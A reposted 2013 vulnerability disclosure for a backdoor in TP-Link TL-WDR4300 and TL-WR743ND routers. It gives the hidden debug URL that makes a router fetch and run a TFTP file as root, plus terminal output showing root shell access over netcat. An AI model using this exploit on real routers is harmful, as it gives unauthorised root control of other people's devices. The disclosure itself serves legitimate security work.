登录
    最新消息:
    你的位置:爱开源 > 未分类 > TP-Link http/tftp backdoor

    TP-Link http/tftp backdoor

    未分类 admin 3674浏览 0评论

    TP-Link TL-WDR4300 is a popular dual band WiFi, SOHO class router.

    tp-logo
    Tested Firmware

    We tested the remote root PoC on the newest firmware (published on 25.12.2012):

    firmware_version

    TL-WDR4300 – tested firmware version

    The following info is provided for educational use only! We are also not resposible for any potential damages of the devices which are tested for this vulnerability.

    Update: more info about the issues in the router is available here.

    Proof of Concept

     

    root@secu:~# nc 192.168.0.1 2222
(UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused
root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html                                                                                                                       --2013-03-09 23:22:31--  http://192.168.0.1/userRpmNatDebugRpm26525557/start_art                                                                                                                     .html
Connecting to 192.168.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: "start_art.html"

    [ <=>                                   ] 426         --.-K/s   in 0s

2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426]

root@secu:~# nc 192.168.0.1 2222
ps
  PID  Uid     VmSize Stat Command
    1 root        404 S   init
    2 root            SW< [kthreadd]
    3 root            SW< [ksoftirqd/0]
    4 root            SW< [events/0]
    5 root            SW< [khelper]
    6 root            SW< [async/mgr]
    7 root            SW< [kblockd/0]
    8 root            SW  [pdflush]
    9 root            SW  [pdflush]
   10 root            SW< [kswapd0]
   17 root            SW< [mtdblockd]
   18 root            SW< [unlzma/0]
   71 root       2768 S   /usr/bin/httpd
   76 root        380 S   /sbin/getty ttyS0 115200
   78 root        208 S   ipcserver
   82 root       2768 S   /usr/bin/httpd
   83 root       2768 S   /usr/bin/httpd
   86 root        732 S   ushare -d -x -f /tmp/ushare.conf
   92 root        348 S   syslogd -C -l 7
   96 root        292 S   klogd
  101 root            SW< [napt_ct_scan]
  246 root        348 S   /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
  247 root        204 S   /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
  251 root        364 S   /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf
  286 root       2768 S   /usr/bin/httpd
  299 root       2768 S   /usr/bin/httpd
  300 root       2768 S   /usr/bin/httpd
  305 root       2768 S   /usr/bin/httpd
  307 root       2768 S   /usr/bin/httpd
  309 root       2768 S   /usr/bin/httpd
  310 root       2768 S   /usr/bin/httpd
  389 root       2768 S   /usr/bin/httpd

    Details

    After the following HTTP request is sent:

    http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html

    the router downloads a file (nart.out) from the host which has issed the http request and executes is as root:

    tp-link-diag

    PoC – diagram

    Sample captures from the host which issues the http request:

    wireshark_tmp

    Wireshark filter used to show router tftp traffic

    wireshark1

    nart.out tftp request

    Models affected

    • TL-WDR4300
    • TL-WR743ND (v1.2 v2.0)

    History of the bug

    12.02.2013 – TP-Link e-mailed with details – no response
    22.02.2013 – TP-Link again e-mailed with details – no response
    12.03.2013 – public disclosure

    More information

    http://www.aikaiyuan.com/2436.html

    相关文章

    转载请注明:爱开源 » TP-Link http/tftp backdoor

    与本文相关的文章

    您必须 登录 才能发表评论!